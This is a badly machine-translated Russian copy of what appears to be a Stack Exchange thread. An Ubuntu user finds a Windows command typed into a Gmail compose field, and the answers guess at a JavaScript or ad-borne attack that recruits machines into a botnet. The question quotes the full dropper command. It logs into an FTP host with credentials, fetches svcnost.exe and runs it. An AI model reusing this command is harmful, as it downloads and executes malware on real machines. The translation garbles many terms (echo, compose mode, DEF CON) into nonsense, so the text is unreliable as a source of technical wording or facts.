Как определить, был ли мой компьютер Linux взломан?
Мой домашний ПК обычно включен, но монитор выключен. Этим вечером я пришел домой от работы и нашел то, что похоже на попытку взлома: в моем браузере мой Gmail был открыт (который был я), но это было в, составляют режим со следующим в TO поле:
md/c эхо открывают cCTeamFtp.yi.org 21>> ik &echo пользователь ccteam10 765824>> ik &echo, двоичный файл>> ik &echo получают svcnost.exe>> ik &echo до свидания>> ik &ftp-n-v-s:ik &del ik, &svcnost.exe &exit повторяют Вас, принадлежал
Это похоже на код командной строки Windows мне, и md запустите кода, объединенного с тем, что Gmail был в, составляют режим, делает это очевидным, что кто-то пытался выполнить a cmd команда. Я - предположение, я был удачлив, что на самом деле не запускаю Windows на этом ПК, но у меня есть другие, которые делают. Это - первый раз когда-либо, что что-то вроде этого произошло со мной. Я не гуру Linux, и я не запускал никакие другие программы кроме Firefox в то время.
Я абсолютно уверен, что не записал это, и никто больше не был физически в моем компьютере. Кроме того, я недавно изменил свой пароль Google (и все свои другие пароли) к чему-то как vMA8ogd7bv таким образом, я не думаю, что кто-то взломал мою учетную запись Google.
Что просто произошло? Как кто-то помещает нажатия клавиш на мой компьютер, когда это не старая машина Windows бабули, которая запускала вредоносное программное обеспечение в течение многих лет, но недавнюю новую установку Ubuntu?
Обновление:
Позвольте мне обратиться к некоторым точкам и вопросам:
- Я нахожусь в Австрии в сельской местности. Мой маршрутизатор WLAN выполняет WPA2/PSK и средний сильный пароль, это не находится в словаре; должно было бы быть "в лоб" и меньше чем 50 метров отсюда; маловероятно, что это было взломано.
- Я использую соединенную проводом клавиатуру USB, поэтому снова очень вряд ли, что кто-либо мог быть в диапазоне для взламывания ее.
- Я не использовал свой компьютер в то время; это просто бездействовало дома, в то время как я работал. Это - смонтированный монитором неттоп ПК, таким образом, я редко выключаю его.
- Машине только два месяца, только Ubuntu выполнений, и я не использую странное программное обеспечение или посещаю странные сайты. Это - главным образом Exchange Стека, Gmail и газеты. Никакие игры. Ubuntu установлена усовершенствовать себя.
- Я не знаю, что любой сервис VNC работает; я, конечно, не установил или включил тот. Я также не запустил никакие другие серверы. Я не уверен, если кто-либо работает в Ubuntu по умолчанию?
- Я знаю все IP-адреса в действии учетной записи Gmail. Я - абсолютно уверенный Google, не была лестничная площадка.
- Я нашел Средство просмотра Файла журнала, но я не знаю, что искать.Помощь?
То, что я действительно хочу знать, и что действительно заставляет меня чувствовать себя небезопасным: как может кто-либо из Интернета генерировать нажатия клавиш на моей машине? Как я могу предотвратить это, не будучи всей шляпой фольги об этом? Я не фанат Linux, я - родительский элемент, который смешан с Windows для 20 + годы и устал от него. И во всех 18 + годы того, чтобы быть онлайн, я лично никогда не видел попытки взлома, таким образом, это плохо мне знакомо.
5 ответов
Я сомневаюсь, что у Вас есть что-либо для волнения о. Это были больше, чем, вероятно, нападение JavaScript, которое пыталось сделать диск загрузкой. Если Вы обеспокоены этим случаем, начинают использовать NoScript и AdBlock Плюс Дополнения Firefox.
Даже посещая защищенные сайты Вы не в безопасности, потому что они выполняют код JavaScript из сторонних рекламодателей, которые могут быть злонамеренными.
Я захватил его и выполнил его в VM. Это установило mirc, и это - журнал состояния... http://pastebin.com/Mn85akMk
Это - автоматизированное нападение, которое пытается заставить Вас загружать mIRC и присоединяться к ботнету, который превратит Вас в спам-робот... Это имело мое соединение VM, и установите связь со многими различными удаленными адресами, один из которых autoemail-119.west320.com.
Выполнение его в Windows 7 I должно было признать, что контроль учётных записей запрашивает и предоставляет ему доступ через брандмауэр.
Кажется, существуют тонны сообщений об этой точной команде на других форумах, и кто-то даже говорит, что файл потока пытался выполнить ее, когда она была закончена, загрузив... Я не уверен, как это было бы возможно все же.
Я не использовал это сам, но это должно смочь показать Вам текущие сетевые соединения, таким образом, Вы видите, подключены ли Вы к чему-то из нормы: http://netactview.sourceforge.net/download.html
Я соглашаюсь с @jb48394, что это - вероятно, использование JavaScript, как все остальное в эти дни.
То, что это пыталось открыть a cmd окно (см. комментарий @torbengb) и выполняет злонамеренную команду, вместо того, чтобы просто загрузить троянца осторожно в фоновом режиме, предполагает, что это использует некоторую уязвимость в Firefox, который позволяет этому вводить нажатия клавиш, но не выполнять код.
Это также объясняет, почему это использование, которое было ясно записано исключительно для Windows, будет также работать в Linux: Firefox выполняет JavaScript тот же путь во всем OS'es (по крайней мере, он пытается :)). Если бы это было вызвано переполнением буфера или подобным использованием, предназначенным для Windows, это просто разрушило бы программу.
Что касается того, где код JavaScript прибыл из - вероятно, злонамеренное объявление Google (цикл рекламы в Gmail в течение дня). Это не был бы быть сначала время.
Это не отвечает на Ваш целый вопрос, но в файле журнала ищут неудавшиеся попытки входа в систему.
Если существуют больше, чем приблизительно пять неудачных попыток в Вашем журнале, то кто-то пытался расколоться root. Если существует успешная попытка войти в систему к root в то время как Вы были вдали от своего компьютера, сразу ИЗМЕНЯЕТЕ ВАШ ПАРОЛЬ!! Я имею в виду ПРЯМО СЕЙЧАС! Предпочтительно к чему-то алфавитно-цифровому, и приблизительно 10 символам долго.
С сообщениями, что Вы добрались ( echo команды), это действительно походит на некоторую незрелую деточку сценария. Если бы это был настоящий хакер, кто знает то, что он делал, Вы, вероятно, все еще не знали бы об этом.
Я нашел подобное нападение на другую машину Linux. Кажется, что это - некоторая команда FTP для Windows.
whois отчеты west320.com принадлежат Microsoft.
UPnP и Винишко (Система-> Предпочтения-> Удаленный рабочий стол) объединенный со слабым паролем Ubuntu?
Вы использовали какие-либо нестандартные репозитории?
ДОВОД "ПРОТИВ" DEF имеет конкуренцию Wi-Fi каждый год относительно того, как далеко далеко точка доступа Wi-Fi может быть достигнута - последнее, я слышал, что это были 250 миль.
Если Вы действительно хотите бояться, посмотрите на снимки экрана центра N-Control команды ботнета Zeus. Никакая машина не безопасна, но Firefox на Linux более безопасен, чем остальные. Еще лучше, если Вы выполняете SELinux.